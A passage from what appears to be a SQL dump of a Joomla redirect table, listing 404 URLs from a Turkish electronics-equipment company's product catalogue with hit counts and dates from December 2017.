10:24:57','0000-00-00 00:00:00',301),(16855,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',421,0,'2017-12-27 10:24:58','0000-00-00 00:00:00',301),(16856,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',74,0,'2017-12-27 10:25:13','0000-00-00 00:00:00',301),(16857,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',381,0,'2017-12-27 10:25:20','0000-00-00 00:00:00',301),(16858,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,`p`.product_sku',NULL,'','',414,0,'2017-12-27 10:25:23','0000-00-00 00:00:00',301),(16859,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',423,0,'2017-12-27 10:25:26','0000-00-00 00:00:00',301),(16860,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,category_name',NULL,'','',424,0,'2017-12-27 10:25:33','0000-00-00 00:00:00',301),(16861,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,ordering',NULL,'','',384,0,'2017-12-27 10:25:35','0000-00-00 00:00:00',301),(16862,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,category_name/dirdesc',NULL,'','',423,0,'2017-12-27 10:25:36','0000-00-00 00:00:00',301),(16863,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',76,0,'2017-12-27 10:25:41','0000-00-00 00:00:00',301),(16864,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,mf_name',NULL,'','',410,0,'2017-12-27 10:25:42','0000-00-00 00:00:00',301),(16865,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,mf_name/dirdesc',NULL,'','',419,0,'2017-12-27 10:25:44','0000-00-00 00:00:00',301),(16866,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,pc.ordering,product_name',NULL,'','',381,0,'2017-12-27 10:25:46','0000-00-00 00:00:00',301),(16867,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,pc.ordering,product_name',NULL,'','',411,0,'2017-12-27 10:25:50','0000-00-00 00:00:00',301),(16868,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',411,0,'2017-12-27 10:25:52','0000-00-00 00:00:00',301),(16869,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',378,0,'2017-12-27 10:25:53','0000-00-00 00:00:00',301),(16870,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',68,0,'2017-12-27 10:25:54','0000-00-00 00:00:00',301),(16871,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,product_name',NULL,'','',422,0,'2017-12-27 10:26:00','0000-00-00 00:00:00',301),(16872,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın/by,product_name/dirdesc',NULL,'','',427,0,'2017-12-27 10:26:02','0000-00-00 00:00:00',301),(16873,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',71,0,'2017-12-27 10:26:07','0000-00-00 00:00:00',301),(16874,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın/dirdesc',NULL,'','',430,0,'2017-12-27 10:26:09','0000-00-00 00:00:00',301),(16875,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',418,0,'2017-12-27 10:26:16','0000-00-00 00:00:00',301),(16876,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',430,0,'2017-12-27 10:26:18','0000-00-00 00:00:00',301),(16877,'http://3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',375,0,'2017-12-27 10:26:21','0000-00-00 00:00:00',301),(16878,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,category_name',NULL,'','',420,0,'2017-12-27 10:26:23','0000-00-00 00:00:00',301),(16879,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',432,0,'2017-12-27 10:26:24','0000-00-00 00:00:00',301),(16880,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,mf_name',NULL,'','',421,0,'2017-12-27 10:26:30','0000-00-00 00:00:00',301),(16881,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',69,0,'2017-12-27 10:26:31','0000-00-00 00:00:00',301),(16882,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',425,0,'2017-12-27 10:26:31','0000-00-00 00:00:00',301),(16883,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',418,0,'2017-12-27 10:26:37','0000-00-00 00:00:00',301),(16884,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',411,0,'2017-12-27 10:26:39','0000-00-00 00:00:00',301),(16885,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',70,0,'2017-12-27 10:26:41','0000-00-00 00:00:00',301),(16886,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,product_name',NULL,'','',405,0,'2017-12-27 10:26:46','0000-00-00 00:00:00',301),(16887,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',401,0,'2017-12-27 10:26:48','0000-00-00 00:00:00',301),(16888,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı/dirdesc',NULL,'','',405,0,'2017-12-27 10:26:53','0000-00-00 00:00:00',301),(16889,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,`p`.product_sku',NULL,'','',396,0,'2017-12-27 10:27:01','0000-00-00 00:00:00',301),(16890,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',398,0,'2017-12-27 10:27:05','0000-00-00 00:00:00',301),(16891,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,category_name',NULL,'','',418,0,'2017-12-27 10:27:10','0000-00-00 00:00:00',301),(16892,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',65,0,'2017-12-27 10:27:11','0000-00-00 00:00:00',301),(16893,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',426,0,'2017-12-27 10:27:11','0000-00-00 00:00:00',301),(16894,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,mf_name',NULL,'','',432,0,'2017-12-27 10:27:17','0000-00-00 00:00:00',301),(16895,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',65,0,'2017-12-27 10:27:18','0000-00-00 00:00:00',301),(16896,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',437,0,'2017-12-27 10:27:18','0000-00-00 00:00:00',301),(16897,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',423,0,'2017-12-27 10:27:24','0000-00-00 00:00:00',301),(16898,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',421,0,'2017-12-27 10:27:26','0000-00-00 00:00:00',301),(16899,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,product_name',NULL,'','',428,0,'2017-12-27 10:27:32','0000-00-00 00:00:00',301),(16900,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',423,0,'2017-12-27 10:27:34','0000-00-00 00:00:00',301),(16901,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',65,0,'2017-12-27 10:27:38','0000-00-00 00:00:00',301),(16902,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız/dirdesc',NULL,'','',423,0,'2017-12-27 10:27:39','0000-00-00 00:00:00',301),(16903,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',406,0,'2017-12-27 10:27:47','0000-00-00 00:00:00',301),(16904,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',381,0,'2017-12-27 10:27:49','0000-00-00 00:00:00',301),(16905,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',65,0,'2017-12-27 10:27:56','0000-00-00 00:00:00',301),(16906,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',408,0,'2017-12-27 10:27:57','0000-00-00 00:00:00',301),(16907,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',65,0,'2017-12-27 10:28:03','0000-00-00 00:00:00',301),(16908,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',400,0,'2017-12-27 10:28:06','0000-00-00 00:00:00',301),(16909,'http://3s-technologies.com.tr/en/products/smd-fırın/by,`p`.product_sku',NULL,'','',389,0,'2017-12-27 10:28:08','0000-00-00 00:00:00',301),(16910,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',393,0,'2017-12-27 10:28:13','0000-00-00 00:00:00',301),(16911,'http://3s-technologies.com.tr/en/products/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',390,0,'2017-12-27 10:28:17','0000-00-00 00:00:00',301),(16912,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name',NULL,'','',407,0,'2017-12-27 10:28:17','0000-00-00 00:00:00',301),(16913,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',409,0,'2017-12-27 10:28:19','0000-00-00 00:00:00',301),(16914,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',65,0,'2017-12-27 10:28:29','0000-00-00 00:00:00',301),(16915,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',409,0,'2017-12-27 10:28:30','0000-00-00 00:00:00',301),(16916,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',64,0,'2017-12-27 10:28:46','0000-00-00 00:00:00',301),(16917,'http://3s-technologies.com.tr/en/products/smd-fırın/by,category_name/dirdesc',NULL,'','',403,0,'2017-12-27 10:28:46','0000-00-00 00:00:00',301),(16918,'http://3s-technologies.com.tr/en/products/smd-fırın/by,mf_name/dirdesc',NULL,'','',379,0,'2017-12-27 10:29:14','0000-00-00 00:00:00',301),(16919,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız',NULL,'','',75,0,'2017-12-27 10:29:23','0000-00-00 00:00:00',301),(16920,'http://3s-technologies.com.tr/en/products/smd-fırın/by,ordering',NULL,'','',398,0,'2017-12-27 10:29:31','0000-00-00 00:00:00',301),(16921,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',65,0,'2017-12-27 10:29:36','0000-00-00 00:00:00',301),(16922,'http://3s-technologies.com.tr/en/products/smd-fırın/by,pc.ordering,product_name',NULL,'','',397,0,'2017-12-27 10:29:43','0000-00-00 00:00:00',301),(16923,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',63,0,'2017-12-27 10:29:47','0000-00-00 00:00:00',301),(16924,'http://3s-technologies.com.tr/en/products/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',396,0,'2017-12-27 10:29:50','0000-00-00 00:00:00',301),(16925,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',67,0,'2017-12-27 10:30:14','0000-00-00 00:00:00',301),(16926,'http://3s-technologies.com.tr/en/products/smd-fırın/by,product_name/dirdesc',NULL,'','',397,0,'2017-12-27 10:30:20','0000-00-00 00:00:00',301),(16927,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',68,0,'2017-12-27 10:30:24','0000-00-00 00:00:00',301),(16928,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',70,0,'2017-12-27 10:30:44','0000-00-00 00:00:00',301),(16929,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',69,0,'2017-12-27 10:30:54','0000-00-00 00:00:00',301),(16930,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',70,0,'2017-12-27 10:31:15','0000-00-00 00:00:00',301),(16931,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',72,0,'2017-12-27 10:31:27','0000-00-00 00:00:00',301),(16932,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',70,0,'2017-12-27 10:31:34','0000-00-00 00:00:00',301),(16933,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',70,0,'2017-12-27 10:32:02','0000-00-00 00:00:00',301),(16934,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',412,0,'2017-12-27 10:32:13','0000-00-00 00:00:00',301),(16935,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',67,0,'2017-12-27 10:32:15','0000-00-00 00:00:00',301),(16936,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',414,0,'2017-12-27 10:32:18','0000-00-00 00:00:00',301),(16937,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,category_name/dirdesc',NULL,'','',1,0,'2017-12-27 10:32:21','0000-00-00 00:00:00',301),(16938,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın',NULL,'','',73,0,'2017-12-27 10:32:36','0000-00-00 00:00:00',301),(16939,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',429,0,'2017-12-27 10:32:41','0000-00-00 00:00:00',301),(16940,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',68,0,'2017-12-27 10:32:42','0000-00-00 00:00:00',301),(16941,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',67,0,'2017-12-27 10:32:51','0000-00-00 00:00:00',301),(16942,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',401,0,'2017-12-27 10:33:08','0000-00-00 00:00:00',301),(16943,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',73,0,'2017-12-27 10:33:13','0000-00-00 00:00:00',301),(16944,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc',NULL,'','',69,0,'2017-12-27 10:33:25','0000-00-00 00:00:00',301),(16945,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,ordering',NULL,'','',387,0,'2017-12-27 10:33:26','0000-00-00 00:00:00',301),(16946,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',381,0,'2017-12-27 10:33:44','0000-00-00 00:00:00',301),(16947,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',72,0,'2017-12-27 10:33:50','0000-00-00 00:00:00',301),(16948,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',385,0,'2017-12-27 10:33:51','0000-00-00 00:00:00',301),(16949,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc',NULL,'','',71,0,'2017-12-27 10:33:54','0000-00-00 00:00:00',301),(16950,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',71,0,'2017-12-27 10:34:17','0000-00-00 00:00:00',301),(16951,'http://3s-technologies.com.tr/en/products/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',375,0,'2017-12-27 10:34:18','0000-00-00 00:00:00',301),(16952,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',72,0,'2017-12-27 10:34:33','0000-00-00 00:00:00',301),(16953,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',71,0,'2017-12-27 10:34:39','0000-00-00 00:00:00',301),(16954,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',71,0,'2017-12-27 10:35:08','0000-00-00 00:00:00',301),(16955,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',71,0,'2017-12-27 10:35:33','0000-00-00 00:00:00',301),(16956,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,`p`.product_sku',NULL,'','',380,0,'2017-12-27 10:35:54','0000-00-00 00:00:00',301),(16957,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',379,0,'2017-12-27 10:36:01','0000-00-00 00:00:00',301),(16958,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',71,0,'2017-12-27 10:36:14','0000-00-00 00:00:00',301),(16959,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',70,0,'2017-12-27 10:36:19','0000-00-00 00:00:00',301),(16960,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',380,0,'2017-12-27 10:36:38','0000-00-00 00:00:00',301),(16961,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name',NULL,'','',79,0,'2017-12-27 10:36:46','0000-00-00 00:00:00',301),(16962,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',77,0,'2017-12-27 10:36:53','0000-00-00 00:00:00',301),(16963,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',367,0,'2017-12-27 10:37:08','0000-00-00 00:00:00',301),(16964,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name',NULL,'','',78,0,'2017-12-27 10:37:25','0000-00-00 00:00:00',301),(16965,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',77,0,'2017-12-27 10:37:33','0000-00-00 00:00:00',301),(16966,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,ordering',NULL,'','',370,0,'2017-12-27 10:37:40','0000-00-00 00:00:00',301),(16967,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',369,0,'2017-12-27 10:37:56','0000-00-00 00:00:00',301),(16968,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,ordering',NULL,'','',72,0,'2017-12-27 10:37:58','0000-00-00 00:00:00',301),(16969,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',367,0,'2017-12-27 10:38:03','0000-00-00 00:00:00',301),(16970,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name',NULL,'','',79,0,'2017-12-27 10:38:11','0000-00-00 00:00:00',301),(16971,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name/dirdesc',NULL,'','',72,0,'2017-12-27 10:38:21','0000-00-00 00:00:00',301),(16972,'http://3s-technologies.com.tr/en/products/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',392,0,'2017-12-27 10:38:40','0000-00-00 00:00:00',301),(16973,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_sku',NULL,'','',83,0,'2017-12-27 10:38:49','0000-00-00 00:00:00',301),(16974,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/dirdesc',NULL,'','',82,0,'2017-12-27 10:39:18','0000-00-00 00:00:00',301),(16975,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,`p`.product_sku',NULL,'','',74,0,'2017-12-27 10:40:27','0000-00-00 00:00:00',301),(16976,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',75,0,'2017-12-27 10:40:41','0000-00-00 00:00:00',301),(16977,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',74,0,'2017-12-27 10:40:43','0000-00-00 00:00:00',301),(16978,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',78,0,'2017-12-27 10:40:53','0000-00-00 00:00:00',301),(16979,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,category_name',NULL,'','',85,0,'2017-12-27 10:41:11','0000-00-00 00:00:00',301),(16980,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,category_name',NULL,'','',82,0,'2017-12-27 10:41:14','0000-00-00 00:00:00',301),(16981,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',72,0,'2017-12-27 10:41:17','0000-00-00 00:00:00',301),(16982,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,category_name/dirdesc',NULL,'','',76,0,'2017-12-27 10:41:22','0000-00-00 00:00:00',301),(16983,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,mf_name',NULL,'','',89,0,'2017-12-27 10:41:42','0000-00-00 00:00:00',301),(16984,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',80,0,'2017-12-27 10:41:44','0000-00-00 00:00:00',301),(16985,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,mf_name',NULL,'','',85,0,'2017-12-27 10:42:02','0000-00-00 00:00:00',301),(16986,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,ordering',NULL,'','',88,0,'2017-12-27 10:42:08','0000-00-00 00:00:00',301),(16987,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,mf_name/dirdesc',NULL,'','',80,0,'2017-12-27 10:42:14','0000-00-00 00:00:00',301),(16988,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_name',NULL,'','',88,0,'2017-12-27 10:42:22','0000-00-00 00:00:00',301),(16989,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_name/dirdesc',NULL,'','',82,0,'2017-12-27 10:42:31','0000-00-00 00:00:00',301),(16990,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_sku',NULL,'','',80,0,'2017-12-27 10:42:46','0000-00-00 00:00:00',301),(16991,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,ordering',NULL,'','',81,0,'2017-12-27 10:42:46','0000-00-00 00:00:00',301),(16992,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/dirdesc',NULL,'','',87,0,'2017-12-27 10:43:04','0000-00-00 00:00:00',301),(16993,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_name',NULL,'','',83,0,'2017-12-27 10:43:09','0000-00-00 00:00:00',301),(16994,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_name/dirdesc',NULL,'','',83,0,'2017-12-27 10:43:25','0000-00-00 00:00:00',301),(16995,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_sku',NULL,'','',82,0,'2017-12-27 10:43:47','0000-00-00 00:00:00',301),(16996,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/dirdesc',NULL,'','',86,0,'2017-12-27 10:44:08','0000-00-00 00:00:00',301),(16997,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku',NULL,'','',81,0,'2017-12-27 10:44:11','0000-00-00 00:00:00',301),(16998,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',82,0,'2017-12-27 10:44:16','0000-00-00 00:00:00',301),(16999,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',86,0,'2017-12-27 10:44:36','0000-00-00 00:00:00',301),(17000,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name/dirdesc',NULL,'','',81,0,'2017-12-27 10:44:44','0000-00-00 00:00:00',301),(17001,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',76,0,'2017-12-27 10:45:06','0000-00-00 00:00:00',301),(17002,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',78,0,'2017-12-27 10:45:13','0000-00-00 00:00:00',301),(17003,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,ordering',NULL,'','',81,0,'2017-12-27 10:45:41','0000-00-00 00:00:00',301),(17004,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',75,0,'2017-12-27 10:45:54','0000-00-00 00:00:00',301),(17005,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',77,0,'2017-12-27 10:45:58','0000-00-00 00:00:00',301),(17006,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',73,0,'2017-12-27 10:46:02','0000-00-00 00:00:00',301),(17007,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',76,0,'2017-12-27 10:46:04','0000-00-00 00:00:00',301),(17008,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name',NULL,'','',108,0,'2017-12-27 10:46:21','0000-00-00 00:00:00',301),(17009,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',84,0,'2017-12-27 10:46:28','0000-00-00 00:00:00',301),(17010,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',75,0,'2017-12-27 10:46:33','0000-00-00 00:00:00',301),(17011,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',82,0,'2017-12-27 10:46:37','0000-00-00 00:00:00',301),(17012,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name',NULL,'','',81,0,'2017-12-27 10:47:13','0000-00-00 00:00:00',301),(17013,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',77,0,'2017-12-27 10:47:23','0000-00-00 00:00:00',301),(17014,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',88,0,'2017-12-27 10:47:38','0000-00-00 